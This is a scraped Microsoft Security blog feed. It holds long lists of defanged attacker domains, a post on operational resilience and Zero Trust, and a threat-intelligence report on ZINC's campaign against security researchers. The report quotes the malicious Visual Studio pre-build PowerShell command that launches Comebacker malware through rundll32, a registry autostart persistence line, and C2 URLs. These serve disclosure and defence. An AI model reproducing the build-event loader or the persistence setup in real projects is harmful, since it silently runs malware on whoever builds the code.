eontaysstrangesecureasia[.]us epropivedsstrangevip[.]us ereplyggstangeasia[.]us
ereplyggstangedigital[.]us ereplyggstangeereplys[.]us ereplyggstangelifes[.]us
ereplyggstangenetwork[.]us ereplyggstangesecureasia[.]us frostsstrangeworld[.]us
servicceivedsstrangevip[.]us servicplysstrangeasia[.]us servicplysstrangedigital[.]us
servicplysstrangelife[.]us servicplysstrangelifes[.]us servicplysstrangenetwork[.]us
ereceivedsstrangesecureworld[.]us ereceivedsstrangetoday[.]us ereceivedsstrangeus[.]us
esendsstrangesecurelife[.]us sendsstrangesecureesendss[.]us ereplysstrangesecureasia[.]us
ereplysstrangesecurenetwork[.]us receivedsstrangesecurelife[.]us ereplysstrangeworld[.]us
reauestysstrangesecurelive[.]us ereceivedsstrangeworld[.]us esendsstrangesecurerocks[.]us
reauestysstrangesecuredigital[.]us reauestysstrangesecurenetwork[.]us reauestysstrangesecurevip[.]us
replysstrangesecurelife[.]us ereauestysstrangesecurerocks[.]us ereceivedsstrangeasia[.]us
ereceivedsstrangedigital[.]us ereceivedsstrangeereceiveds[.]us ereceivedsstrangelife[.]us
ereceivedsstrangelifes[.]us ereceivedsstrangenetwork[.]us ereceivedsstrangerocks[.]us
ereceivedsstrangesecureasia[.]us receivedsstrangeworld[.]us replysstrangedigital[.]us
invdeliverynows[.]us esendsstrangesecuredigital[.]us esendsstrangesecureworld[.]us
sendsstrangesecurenetwork[.]us ereceivedsstrangevip[.]us replysstrangerocs[.]us
replysstrangesecurelive[.]us invpaymentnoweros[.]us invpaymentnowes[.]us
replysstrangeracs[.]us reauestysstrangesecurebest[.]us receivedsstrangesecurebest[.]us
reauestysstrangesecurelife[.]us ereplysstrangevip[.]us reauestysstrangesecuretoday[.]us
ereplysstrangesecureus[.]us ereplysstrangetoday[.]us ereceivedsstrangesecuredigital[.]us
ereceivedsstrangesecureereceiveds[.]us ereceivedsstrangesecurelife[.]us ereceivedsstrangesecurenetwork[.]us
ereceivedsstrangesecurerocks[.]us ereceivedsstrangesecureus[.]us ereceivedsstrangesecurevip[.]us
sendsstrangesecurebest[.]us sendsstrangesecuredigital[.]us sendsstrangesecurelive[.]us
sendsstrangesecureworld[.]us esendsstrangedigital[.]us esendsstrangeesends[.]us
esendsstrangelifes[.]us esendsstrangerocks[.]us esendsstrangesecureasia[.]us
esendsstrangesecureesends[.]us esendsstrangesecurenetwork[.]us esendsstrangesecureus[.]us
esendsstrangesecurevip[.]us esendsstrangevip[.]us ereauestysstrangesecureasia[.]us
ereplysstrangeasia[.]us ereplysstrangedigital[.]us ereplysstrangeereplys[.]us
ereplysstrangelife[.]us ereplysstrangelifes[.]us ereplysstrangenetwork[.]us
ereplysstrangerocks[.]us ereplysstrangesecuredigital[.]us ereplysstrangesecureereplys[.]us
ereplysstrangesecurelife[.]us ereplysstrangesecurerocks[.]us ereplysstrangesecurevip[.]us
ereplysstrangesecureworld[.]us ereplysstrangeus[.]us reauestysstrangesecureclub[.]us
reauestysstrangesecureereauestyss[.]us reauestysstrangesecureworld[.]us receivedsstrangesecureclub[.]us
receivedsstrangesecuredigital[.]us receivedsstrangesecureereceivedss[.]us receivedsstrangesecurelive[.]us
receivedsstrangesecurenetwork[.]us receivedsstrangesecuretoday[.]us receivedsstrangesecurevip[.]us
receivedsstrangesecureworld[.]us replysstrangesecurebest[.]us replysstrangesecureclub[.]us
replysstrangesecuredigital[.]us replysstrangesecureereplyss[.]us replysstrangesecurenetwork[.]us
replysstrangesecuretoday[.]us replysstrangesecurevip[.]us replysstrangesecureworld[.]us
sendsstrangesecurevip[.]us esendsstrangelife[.]us esendsstrangenetwork[.]us
esendsstrangetoday[.]us esendsstrangeus[.]us esendsstrangeworld[.]us
sendsstrangesecureclub[.]us sendsstrangesecurelife[.]us plysstrangelifes[.]us
intulifeinoi[.]us replysstrangerocks[.]us invpaymentnowe[.]us
replysstrangelifes[.]us replysstrangenetwork[.]us invdeliverynowr[.]us
ereceivedggstangevip[.]us ereplyggstangerocks[.]us servicceivedsstrangeworld[.]us
servicplysstrangesecureasia[.]us servicplysstrangeservicplys[.]us emailboostgeasia[.]us
emailboostgeereplys[.]us emailboostgenetwork[.]us emailboostgerocks[.]us
eontaysstrangedigital[.]us eontaysstrangeeontays[.]us eontaysstrangelife[.]us
eontaysstrangelifes[.]us epropivedsstrangeworld[.]us ereceivedggstangeworld[.]us
ereplyggstangelife[.]us frostsstrangevip[.]us servicplysstrangerocks[.]us
invdeliverynow[.]us invpaymentnowlife[.]us invdeliverynowes[.]us
invpaymentnowwork[.]us replysstrangedigitals[.]us replysstrangelife[.]us
replysstrangelifee[.]us replystrangeracs[.]us

RandomU domains

cnewyllansf[.]us kibintiwl[.]us planetezs[.]us sakgeldvi[.]us
rdoowvaki[.]us kabelrandjc[.]us wembaafag[.]us postigleip[.]us
jujubugh[.]us honidefic[.]us utietang[.]us scardullowv[.]us
vorlassebv[.]us jatexono[.]us vlevaiph[.]us bridgetissimema[.]us
schildernjc[.]us francadagf[.]us strgatibp[.]us jelenskomna[.]us
prependerac[.]us oktagonisa[.]us enjaularszr[.]us opteahzf[.]us
skaplyndiej[.]us dirnaichly[.]us kiesmanvs[.]us gooitounl[.]us
izvoznojai[.]us kuphindanv[.]us pluienscz[.]us huyumajr[.]us
arrutisdo[.]us loftinumkx[.]us ffermwyrzf[.]us hectorfranez[.]us
munzoneia[.]us savichicknc[.]us nadurogak[.]us raceaddicteg[.]us
mpixiris[.]us lestenas[.]us collahahhaged[.]us enayilebl[.]us
hotteswc[.]us kupakiliayw[.]us deroutarek[.]us pomagatia[.]us
mizbebzpe[.]us firebrandig[.]us univerzamjw[.]us amigosenrutavt[.]us
kafrdaaia[.]us cimadalfj[.]us ubrzanihaa[.]us yamashumiks[.]us
jakartayd[.]us cobiauql[.]us idiofontg[.]us hoargettattzt[.]us
encilips[.]us dafanapydutsb[.]us intereqr[.]us chestecotry[.]us
diegdoceqy[.]us ffwdenaiszh[.]us sterinaba[.]us wamwitaoko[.]us
peishenthe[.]us hegenheimlr[.]us educarepn[.]us ayajuaqo[.]us
imkingdanuj[.]us dypeplayentqt[.]us traktorkaqk[.]us prilipexr[.]us
collazzird[.]us sentaosez[.]us vangnetxh[.]us valdreska[.]us
mxcujatr[.]us angelqtbw[.]us bescromeobsemyb[.]us hoogametas[.]us
mlitavitiwj[.]us pasgemaakhc[.]us facelijaxg[.]us harukihotarugf[.]us
pasosaga[.]us mashimariokt[.]us vodoclundqs[.]us trofealnytw[.]us
cowboyie[.]us dragovanmm[.]us jonuzpura[.]us cahurisms[.]us
leetzetli[.]us jonrucunopz[.]us flaaksik[.]us wizjadne[.]us
zatsopanogn[.]us roblanzq[.]us barbwirelx[.]us givolettoan[.]us
gyfarosmt[.]us zastirkjx[.]us sappianoyv[.]us noneedfordayvnb[.]us
andreguidiao[.]us concubinsel[.]us meljitebj[.]us alcalizezsc[.]us
springenmw[.]us kongovkamev[.]us starlitent[.]us cassineraqy[.]us
ariankacf[.]us plachezxr[.]us abulpasastq[.]us scraithehk[.]us
wintertimero[.]us abbylukis[.]us lumcrizal[.]us trokrilenyr[.]us
skybdragonqx[.]us pojahuez[.]us rambalegiec[.]us relucrarebk[.]us
vupardoumeip[.]us punicdxak[.]us vaninabaranaogw[.]us yesitsmeagainle[.]us
upcominge[.]us arwresaub[.]us zensimup[.]us joelstonem[.]us
ciflaratzz[.]us adespartc[.]us maaltijdr[.]us acmindiaj[.]us
mempetebyj[.]us itorandat[.]us galenicire[.]us cheldisalk[.]us
zooramawpreahkt[.]us sijamskojoc[.]us fliefedomrr[.]us ascenitianyrg[.]us
tebejavaaq[.]us finnerssshu[.]us slimshortyub[.]us angstigft[.]us
avedaviya[.]us aasthakathykh[.]us nesklonixt[.]us drywelyza[.]us
paginomxd[.]us gathesitehalazw[.]us antinodele[.]us ferestat[.]us
tianaoeuat[.]us pogilasyg[.]us mjawxxik[.]us bertolinnj[.]us
auswalzenna[.]us mmmikeyvb[.]us megafonasgc[.]us litnanjv[.]us
boockmasi[.]us andreillazf[.]us vampirupn[.]us lionarivv[.]us
ihmbklkdk[.]us okergeeliw[.]us forthabezb[.]us trocetasss[.]us
kavamennci[.]us mipancepezc[.]us infuuslx[.]us dvodomnogeg[.]us
zensingergy[.]us eixirienhj[.]us trapunted[.]us greatfutbolot[.]us
porajskigx[.]us mumbleiwa[.]us cilindrarqe[.]us uylateidr[.]us
sdsandrahuin[.]us trapeesr[.]us trauttbobw[.]us bostiwro[.]us
niqiniswen[.]us ditionith[.]us folseine[.]us zamoreki[.]us
sonornogae[.]us xlsadlxg[.]us varerizu[.]us seekabelv[.]us
nisabooz[.]us pohvalamt[.]us inassyndr[.]us ivenyand[.]us
karbonsavz[.]us svunturc[.]us babyrosep[.]us aardigerf[.]us
fedrelandx[.]us degaeriah[.]us detidiel[.]us acuendoj[.]us
peludine[.]us impermatav[.]us datsailis[.]us melenceid[.]us
beshinon[.]us dinangnc[.]us fowiniler[.]us laibstadtws[.]us
bischerohc[.]us muctimpubwz[.]us jusidalikan[.]us peerbalkw[.]us
robesikaton[.]us thabywnderlc[.]us osoremep[.]us krlperuoe[.]us
ntarodide[.]us bideoskin[.]us senagena[.]us kelyldori[.]us
kawtriatthu[.]us rbreriaf[.]us enaqwilo[.]us monesine[.]us
onwinaka[.]us yonhydro[.]us siostailpg[.]us bannasba[.]us
milosnicacz[.]us tunenida[.]us sargasseu[.]us malayabc[.]us
prokszacd[.]us premarketcl[.]us zedyahai[.]us xinarmol[.]us
minttaid[.]us pufuletzpb[.]us nekbrekerdv[.]us ppugsasiw[.]us
katarkamgm[.]us kyraidaci[.]us falhiblaqv[.]us lisusant[.]us
mameriar[.]us quslinie[.]us nirdorver[.]us trocairasec[.]us
pochwikbz[.]us ingykhat[.]us okrzynjf[.]us razsutegayl[.]us
dimbachzx[.]us buchingmc[.]us iessemda[.]us fatarelliqi[.]us
efetivumd[.]us vdevicioik[.]us klumppwha[.]us stefiensi[.]us
donetzbx[.]us wetafteto[.]us denementnd[.]us cyllvysr[.]us
viweewmokmt[.]us destescutyi[.]us craulisrt[.]us maggiebagglesxt[.]us
yawapasaqi[.]us spimilatads[.]us paseadoryy[.]us apageyantak[.]us
magicofaloeaj[.]us prefatoryhe[.]us statvaiq[.]us piketuojaqk[.]us
mushipotatobt[.]us suergonugoy[.]us gummiskoxt[.]us torunikc[.]us
adoleishswn[.]us rovljanie[.]us ivicukfa[.]us vajarelliwe[.]us
burksuit[.]us adoraableio[.]us bassettsz[.]us chevyguyxq[.]us
lunamaosa[.]us telemovelmi[.]us pimptazticui[.]us posteryeiq[.]us
miriamloiso[.]us salahlekajl[.]us inveshilifj[.]us alquicelbi[.]us
hitagjafirt[.]us ohatranqm[.]us scosebexgofxu[.]us vivalasuzyygb[.]us
lugleeghp[.]us alicuppippn[.]us wedutuanceseefv[.]us abnodobemmn[.]us
zajdilxtes[.]us inhaltsqxw[.]us rejtacdat[.]us contunaag[.]us
pitajucmas[.]us delopezmc[.]us donjimafx[.]us iheartcoxlc[.]us
rommelcrxgi[.]us jorguetky[.]us jadesellvb[.]us fintercentrosfs[.]us
ralbarix[.]us kynnirinnty[.]us bibulbio[.]us aspazjagh[.]us
gleboqrat[.]us tensinory[.]us usitniterx[.]us zaretkyui[.]us
hentugustqy[.]us surigatoszuk[.]us nitoeranybr[.]us spitzkopuo[.]us
podkarpatruszz[.]us milfincasqo[.]us datatsbjew[.]us changotme[.]us
losbindebt[.]us ninjachuckvb[.]us desfadavacp[.]us potkazatiun[.]us
sernakct[.]us razmersat[.]us purtinaah[.]us ampiovfa[.]us
durstinyskv[.]us kreukenct[.]us shinanyavc[.]us kolaryta[.]us
yangtsekk[.]us voyagedeviema[.]us elblogdelld[.]us utiligijc[.]us
peaplesokqo[.]us jenggoteq[.]us dogliairler[.]us kandizifb[.]us
flunkmasteraz[.]us clewpossejj[.]us hymgaledaja[.]us gmckayar[.]us
fagordul[.]us pnendickhs[.]us arrogede[.]us stilenii[.]us
cafelireao[.]us poishiuuz[.]us nonfunccoupyo[.]us madrigalbta[.]us
tarad[.]us sarahcp[.]us wickyjr[.]us ghadrn[.]us
sirvond[.]us qumarta[.]us verow[.]us mondeki[.]us
lirana[.]us niarvi[.]us belena[.]us qucono[.]us
ulianag[.]us lenut[.]us shivave[.]us jendone[.]us
seddauf[.]us jarare[.]us uchar[.]us ealesa[.]us
wyoso[.]us marnde[.]us thiath[.]us aulax[.]us
bobelil[.]us jestem[.]us detala[.]us phieyen[.]us
annazo[.]us dilen[.]us jelan[.]us ipedana[.]us
keulsph[.]us ztereqm[.]us rinitan[.]us natab[.]us
haritol[.]us ricould[.]us lldra[.]us miniacs[.]us
zahrajr[.]us cayav[.]us pheduk[.]us qugagad[.]us
dehist[.]us letama[.]us mencyat[.]us vindae[.]us
uranc[.]us handil[.]us galezay[.]us bamerna[.]us
yllyn[.]us ckavl[.]us ilalie[.]us daellee[.]us
cuparoc[.]us zelone[.]us burnile[.]us uloryrt[.]us
shexo[.]us phalbe[.]us hanolen[.]us lorria[.]us
beten[.]us xuserye[.]us iclelan[.]us cwokas[.]us
vesic[.]us ontolan[.]us wajdana[.]us telama[.]us
missani[.]us usinaye[.]us ertanom[.]us kericex[.]us
denaga[.]us tyderq[.]us seliza[.]us kinnco[.]us
qurtey[.]us arzenitlu[.]us vellpoildzu[.]us keityod[.]us
ltangerineldf[.]us lizergidft[.]us serrucheah[.]us lolricelolad[.]us
expiantaszg[.]us hljqfyky[.]us abarrosch[.]us lepestrinynr[.]us
elektroduendevq[.]us waggonbauwh[.]us chaquetzgg[.]us revizijiqa[.]us
ziggyiqta[.]us rokenounkaf[.]us lottemanvl[.]us corsetatsvp[.]us
extasiatny[.]us darkinjtat[.]us pastorsta[.]us sategnaxf[.]us
mordiquedp[.]us mogulanbub[.]us aleesexx[.]us strekktumgz[.]us
kresanike[.]us oberhirtesn[.]us wyddiongw[.]us etherviltjd[.]us
gdinauq[.]us tumisolcv[.]us oardbzta[.]us zamislimrx[.]us
tidifkil[.]us anwirbtda[.]us breliaattainoqt[.]us steinzeitps[.]us
grafoay[.]us shuramiok[.]us sanarteau[.]us jerininomgv[.]us
kusturirp[.]us tenisaragonpu[.]us terquezajf[.]us remularegf[.]us
nobanior[.]us julijmc[.]us dekrapp[.]us odaljenakd[.]us


The post What tracking an attacker email infrastructure tells us about persistent cybercriminal operations appeared first on Microsoft Security.

Why operational resilience will be key in 2021, and how this impacts cybersecurity

January 28th, 2021 No comments

The lessons we have learned during the past 12 months have demonstrated that the ability to respond to and bounce back from adversity in general, can impact the short-and long-term success of any organization. It can even dictate the leaders and laggards in any industry.

When we take into consideration that as security threats also become more daunting, with many organizations remaining in a remote work environment, global organizations must reach a state where their core operations and services are not disrupted by unexpected changes.

The key to success in surviving any unforeseen circumstances in 2021, will be operational resiliency. Operational resilience is the ability to sustain business operations during any major event, including a cyberattack. It requires a strategic and holistic view of what could go wrong and how an organization will respond. Consider the risk and response for a utility company, for example, an organization that relies on IoT data, or a manufacturer of medical supplies. While their approach may differ, the impact would be equally as devastating should their operational continuity be halted. In today’s digital world, preparing for cyber threats must be a strategic part of that plan just like any other form of continuity and disaster recovery.

Speaking with customers globally, we know they are not fully prepared to withstand a major cyber event. Whilst many firms have a disaster recovery plan on paper, nearly a quarter have never tested that plan and only 42 percent of global executives are confident their organization could recover from a major cyber event without it affecting their business.

It begins with Zero Trust. Zero Trust is based on three principles, verify explicitly, use least privilege access, and assume breach.

Verify explicitly

Rather than trust users or devices implicitly because they’re on the corporate network or VPN’ed into it, it is critical to assume zero trust and verify each transaction explicitly. This means enabling strong authentication and authorization based on all available data points, including user identity, location, device health, service or workload, data classification, and anomalies.

This starts with strong user authentication. Multi-factor authentication (MFA) is essential, but it’s time to move away from passwords plus SMS and voice calls as authentication factors. Bad actors are getting more sophisticated all the time, and they have found a number of ways to exploit the publicly switched telephone networks (PSTN) that SMS and voice calls use as well as some social engineering methods for getting these codes from users.

For most users on their mobile devices, we believe the right answer is passwordless with app-based authentication, like Microsoft Authenticator, or a hardware key combined with biometrics.

Least privileged access

Least privileged access means that when we do grant access, we grant the minimum level of access the user needs to complete their task, and only for the amount of time they need it. Think about it this way, you can let someone into your building, but only during work hours, and you don’t let them into every lab and office.

Identity Governance allows you to balance your organization’s need for security and employee productivity with the right processes and visibility. It provides you with the capabilities to ensure that the right people have the right access to the right resources.

Assume breach

Finally, operate with the expectation of a breach, and apply techniques such as micro-segmentation and real-time analytics to detect attacks more quickly.

In a Zero Trust model, identities—whether they represent people, services, or IoT devices—define the control plane in which access decisions are made. Digital identities, such as transport layer security (TLS) and code signing certificates, SSH keys, secrets, and other cryptographic assets are critical to authentication, signing, and encryption.

That’s why having a strong identity is the critical first step to the success of a Zero Trust security approach.

Embracing Zero Trust allows organizations to harden their defenses while providing employees access to critical data, even during a cyber event. That’s because identity is the foundation of any Zero Trust security strategy because it automatically blocks attacks through adaptive security policies; across users and the accounts, devices, apps, and networks they are using. Identity is the only system that connects all security solutions together so we have end-to-end visibility to prevent, detect, and respond to distributed and sophisticated attacks thanks to cloud technology.

In a Zero Trust model, identities—whether they represent people, services, or IoT devices—define the control plane in which access decisions are made. Digital identities, such as TLS and code signing certificates, SSH keys, secrets, and other cryptographic assets are critical to authentication, signing, and encryption.

“Human identities” such as passwords, biometrics, and other MFA are critical to identifying and authenticate humans. Being a Zero Trust organization also means pervasive use of multi-factor authentication—which we know prevents 99 percent of credential theft and other intelligent authentication methods that make accessing apps easier and more secure than traditional passwords.

Identity is both the foundation for Zero Trust and acts as a catalyst for digital transformation. It automatically blocks attacks through adaptive security policies. It lets people work whenever and wherever they want, using their favorite devices and applications.

That’s because Zero Trust security relies heavily on pervasive threat signals and insights. It is essential to connect the dots and provide greater visibility to prevent, detect and respond to distributed and sophisticated attacks.

Future-proofing your security posture

As security threats become more daunting and many organizations remain in a remote work environment, global organizations must reach a state where their core operations and services will not be disrupted by unexpected global changes.

To maintain operational resilience, organizations should be regularly evaluating their risk threshold. When we talk about risk, this should include an evaluation of an organization’s ability to effectively respond to changes in the crypto landscape, such as a CA compromise, algorithm deprecation, or quantum threats on the horizon.

Bottom line: organizations must have the ability to operationally execute the processes through a combination of human efforts and technology products and services. The ability to do something as simple as restoring from recent backups will be tested in every ransomware attack, and many organizations will fail this test—not because they are not backing up their systems, but because they haven’t tested the quality of their backup procedures or practiced for a cyber event.

Operational resilience guidelines call for demonstrating that concrete measures are in place to deliver resilient services and that both incident management and contingency plans have been tested. Our new normal means that risks are no longer limited to commonly recognized sources such as cybercriminals, malware, or even targeted attacks. Operational resilience is the necessary framework we must have in place in order to maintain business continuity during any unforeseen circumstances in the year ahead.

We want to help empower every organization on the planet by continuing to share our learnings to help you reach the state where core operations and services won’t be disrupted by geopolitical or socioeconomic events, natural disasters, or even cyber events.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Why operational resilience will be key in 2021, and how this impacts cybersecurity appeared first on Microsoft Security.

ZINC attacks against security researchers

January 28th, 2021 No comments

In recent months, Microsoft has detected cyberattacks targeting security researchers by an actor we track as ZINC. The campaign originally came to our attention after Microsoft Defender for Endpoint detected an attack in progress. Observed targeting includes pen testers, private offensive security researchers, and employees at security and tech companies. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to ZINC, a DPRK-affiliated and state-sponsored group, based on observed tradecraft, infrastructure, malware patterns, and account affiliations.

This ongoing campaign was reported by Google’s Threat Analysis Group (TAG) earlier this week, capturing the browser-facing impact of this attack. By sharing additional details of the attack, we hope to raise awareness in the cybersecurity community about additional techniques used in this campaign and serve as a reminder to security professionals that they are high-value targets for attackers.

We also want to thank our industry colleagues at Twitter and GitHub for their collaboration in this investigation and rapid actions to suspend the malicious accounts targeting the security community and our mutual customers.

We are sharing this information with the community as part of our mission to shine a light on bad actors and elevate awareness of low-profile tactics and techniques that easily fly under the radar of security operations centers (SOCs) or security professionals and are easily overlooked as low-level alerts or benign chatter. The related IoCs and Microsoft Defender for Endpoint product detections we share in this blog will help SOCs proactively hunt for related activity in their environments and elevate any low-level alerts for remediation. ZINC used a variety of new techniques to target the victims, including gaining credibility on social media with genuine content, sending malicious Visual Studio projects, and using a watering hole website weaponized with browser exploits.

Technical details

In mid-2020, ZINC started building a reputation in the security research community on Twitter by retweeting high quality security content and posting about exploit research from an actor-controlled blog. Throughout the lifetime of the campaign, the actor operated several accounts that accounted for roughly 2,000 followers, including many prominent security researchers.

In the image below, one of the actor-controlled Twitter account retweets another of their accounts to amplify their own posts. The posts from the actors received a reasonable amount of attention, usually accumulating several hundred likes or retweets.

Figure 1. Actor-controlled Twitter handles

After building their reputation across their established social media accounts, the actors started approaching potential targets on social media platforms such as Twitter and LinkedIn. The conversations were often seemingly innocuous, asking security questions or talking about exploit techniques. If the researcher was responsive, the actor would offer to move communication to another platform (e.g., email, Discord) in some cases to then send files using encrypted or PGP protected ZIPs.

ZINC also used their Twitter accounts to post links to a security blog they owned (br0vvnn[.]io). These links were also shared by many others in the security community on Twitter and other social media platforms, further deepening trust for the owner and content.

A blog post titled DOS2RCE: A New Technique To Exploit V8 NULL Pointer Dereference Bug, was shared by the actor on October 14, 2020 from Twitter. From October 19-21, 2020, some researchers, who hadn’t been contacted or sent any files by ZINC profiles, clicked the links while using the Chrome browser, resulting in known ZINC malware on their machines soon after. This suggests that a Chrome browser exploit chain was likely hosted on the blog, although we haven’t been able to prove this. Since some of the victim’s browsers were fully patched, it’s also suspected, but unproven, that the exploit chain used 0-day or patch gap exploits. We believe that not all visitors to the site were compromised, even during the dates listed above.

Malicious Visual Studio project

Some of the files sent by ZINC to researchers were malicious Visual Studio projects that included prebuilt binaries. One of the binaries used the well-known name but was a malicious DLL rather than a database file. Microsoft Defender for Endpoint detects these DLLs as Comebacker malware. A pre-build event with a PowerShell command was used to launch Comebacker via rundll32. This use of a malicious pre-build event is an innovative technique to gain execution.

An example of the PowerShell in the pre-build event can be seen here:


powershell -executionpolicy bypass -windowstyle hidden if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path x64\Debug\Browse.VC.db)){rundll32 x64\Debug\Browse.VC.db,ENGINE_get_RAND 7am1cKZAEb9Nl1pL 4201 }


Pre-build events are stored in the .vcxproj file in Visual Studio solutions. The page How to: Use Build Events in MSBuild Projects has a list of other build events and example XML for the events. It would also be possible to abuse a custom build step in the same way.

Analyzing Comebacker DLLs

Once the malicious Visual Studio Project file was built, the process drops C:\ProgramData\VirtualBox\update.bin and adds the file to an autostart registry key. Update.bin (SHA-256: 25d8ae46…) is a different 64-bit DLL file embedded inside Browser.VC.db.

  • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update
  • “C:\Windows\System32\rundll32.exe C:\ProgramData\VirtualBox\update.bin,ASN2_TYPE_new 5I9YjCZ0xlV45Ui8 2907”

The actors put some effort into modifying the Comebacker malware attributes between deployments; file names, file paths and exported functions were regularly changed so these static IOCs can’t be solely relied upon for dependable detection. We were first alerted to the attack when Microsoft Defender for Endpoint detected the Comebacker DLL attempting to perform process privilege escalation. See the Microsoft Defender for Endpoint detections section for a full process chain of the attack.

Klackring malware

Klackring is a DLL that registers a malicious service on the targeted machine. It was deployed to victims either by the Comebacker malware or an unknown dropper. The DLL was dropped to C:\Windows\system32 and saved with the .sys file extension.

MHTML file

In addition to the social engineering attacks via social media platforms, we observed that ZINC sent researchers a copy of a br0vvnn blog page saved as an MHTML file with instructions to open it with Internet Explorer. The MHTML file contained some obfuscated JavaScript that called out to a ZINC-controlled domain for further JavaScript to execute. The site was down at the time of investigation and we have not been able to retrieve the payload for further analysis.

Driver abuse

In one instance, we discovered the actor had downloaded an old version of the Viraglt64.sys driver from the Vir.IT eXplorer antivirus. The file was dropped to the victim system as C:\Windows\System32\drivers\circlassio.sys. The actor then attempted to exploit CVE-2017-16238, described by the finder here, where the driver doesn’t perform adequate checking on a buffer it receives, which can be abused to gain an arbitrary kernel write primitive. The actor’s code however appears to be buggy and when attempting to exploit the vulnerability the exploit tried to overwrite some of the driver’s own code which crashed the victim’s machine.

Other malware

Other tools used included an encrypted Chrome password-stealer hosted on ZINC domain https://codevexillium[.]org. The host DLL (SHA-256: ada7e80c…) was downloaded to the path C:\ProgramData\USOShared\USOShared.bin using PowerShell and then ran via rundll32.  This malware is a weaponized version of CryptLib, and it decrypted the Chrome password stealer (SHA-256: 9fd0506…), which it dropped to C:\ProgramData\USOShared\USOShared.dat.

C2 communication

After establishing a command-and-control (C2) channel on a targeted device, the backdoor is configured to check into the C2 servers every 60 seconds. Over this C2 channel, the threat actors can execute remote commands to enumerate files/directories and running processes, and to collect/upload information about the target device, including IP address, Computer Name, and NetBIOS.  Furthermore, we observed some hands-on-keyboard action to enumerate all files/directories on the target disk, create screenshots, and deploy additional modules.

Microsoft Defender for Endpoint detections

When malware is run from a malicious Visual Studio project, the following alerts and process tree are generated by Microsoft Defender for Endpoint. Multiple alerts, including “Use of living-off-land binary to run malware” and “Process Privilege escalation”, were triggered on the execution of Browser.VC.db and update.bin.

Microsoft Defender for Endpoint has comprehensive detection coverage for this campaign. These detections raise alerts that inform security operations teams about the presence of activities and artifact from the attacks. Security operations and incident response teams can use investigation and remediation tools in Microsoft Defender Endpoint to perform deep investigation and additional hunting.

Figure 2. Alert raised by Microsoft Defender for Endpoint on ComeBacker

Figure 3. Alert raised by Microsoft Defender for Endpoint on low-reputation arbitrary code executed by signed executable

Recommended actions and preventative measures

If you visited the referenced ZINC-owned blog (br0vvnn[.]io), you should immediately run a full antimalware scan and use the provided IOCs to check your systems for intrusion. If a scan or searching for the IOCs find any related malware on your systems, you should assume full compromise and rebuild. Microsoft assesses that security research was the likely objective of the attack, and any information on the affected machine may be compromised.

For proactive prevention of this type of attack, it is recommended that security professionals use an isolated environment (e.g., a virtual machine) for building untrusted projects in Visual Studio or opening any links or files sent by unknown parties.

Associated indicators of compromise (IOCs)

The below list provides IOCs observed during this activity. We encourage our customers to implement detections and protections to identify possible prior campaigns or prevent future campaigns against their systems.

Azure Sentinel customers can find a Sentinel query containing these indicators in this GitHub repo:

Microsoft 365 Defender customers can find related hunting queries below or at this GitHub repo:

Microsoft Defender for Endpoint detections for malware

Actor-controlled Twitter Handles


Actor-controlled LinkedIn profiles


Actor-controlled GitHub Accounts

Further investigation revealed a number of GitHub accounts with names matching the Twitter handles published by Google:


Actor-controlled blog URLs

  • https://br0vvnn[.]io
  • https://blog.br0vvnn[.]io

Actor-controlled C2 domains

  • codevexillium[.]org
  • angeldonationblog[.]com
  • investbooking[.]de
  • krakenfolio[.]com

Likely legitimate but compromised websites used as C2

  • www.dronerc[.]it
  • www.edujikim[.]com
  • www.fabioluciani[.]com
  • trophylab[.]com
  • forums.joycity[.]com
  • Marcodetech[.]net
  • Linelcssplugin[.]org


  • https://codevexillium[.]org/image/download/download.asp
  • https://angeldonationblog[.]com/image/upload/upload.php
  • https://www.dronerc[.]it/shop_testbr/Core/upload.php
  • https://www.dronerc[.]it/forum/uploads/index.php
  • https://www.dronerc[.]it/shop_testbr/upload/upload.php
  • https://www.edujikim[.]com/intro/blue/insert.asp
  • https://investbooking[.]de/upload/upload.asp

Malware hashes

Malicious Visual Studio .vcxproj files

  • 0ac5c8ad0c2ddef4d41724acac586ffabcc92ab9d4906a4fc4a1ff2ec2feec7c
  • 1cc60cb1e08779ff140dfbb4358a7c2587ba58ad2f1f23343b9efb51bb25aaed
  • 5024f199836692fe428aef3d41a561448632e9cbab954f842ef300573600423d
  • 98a6e0c8b8ec4dbbc3ef21308ec04912fa38e84828cedad99e081d588811ba5e
  • d02752aadc71fafa950a6a51b1298dc914e81d20f95a86b12ee07cd2d2a85711

Comebacker malware

  • 0acf21fba2b46ad2dd9c0da887f0fda704e7a5569b735c288d43a57688eb53fa
  • 133280e985448a3cfa8906830af137634c4657740a8c7209a368c5a0d0b3dabf
  • 25d8ae4678c37251e7ffbaeddc252ae2530ef23f66e4c856d98ef60f399fa3dc
  • 284df008aa2459fd1e69b1b1c54fb64c534fce86d2704c4d4cc95d72e8c11d6f
  • 34e13e2efb336fbe8202ca931a496aa451cf554450806b63d25a57a627e0fb65
  • 39ad9ae3780c2f6d41b1897e78f2b2b6d549365f5f024bc68d1fe794b940f9f1
  • 4c3499f3cc4a4fdc7e67417e055891c78540282dccc57e37a01167dfe351b244
  • 68e6b9d71c727545095ea6376940027b61734af5c710b2985a628131e47c6af7
  • 80a19caf4cfc9717d449975f98a157d0a483bf48a05e3b6f7a9b204faa8c35d1
  • 88aeaff0d989db824d6e9429cd94bc22bbbfc39775c0929e703343798f69e9cc
  • 913871432989378a042f5023351c2fa2c2f43b497b75ef2a5fd16d65aa7d0f54
  • ca48fa63bd603c74ab02841fc6b6e90c29a9b740232628fadafa923d2833a314
  • d0678fe8c92912698c4b9d4d03d83131e16d8b219ccf373fa847da476788785b
  • 5815103140c68614fd7fc05bad540e654a37b81b7e451e213128f2eff081005a
  • e413e8094d76061f094f8b9339d00d80514065f7d37c184543c0f80c5d51bd80
  • c23f50c8014c190afa14b4c2c9b85512fb3a75405652c9b6be1401f678295f36
  • a75886b016d84c3eaacaf01a3c61e04953a7a3adf38acf77a4a2e3a8f544f855

Klackring malware

  • 0acf21fba2b46ad2dd9c0da887f0fda704e7a5569b735c288d43a57688eb53fa
  • 16ad21aedf8f43fcedaa19dbd4f4fda0f3fec0517662b99a3054dac6542ab865
  • 1d9a58bc9b6b22fb3e3099996dbab13bfc5258b8307026f66fa69729d40f2b13
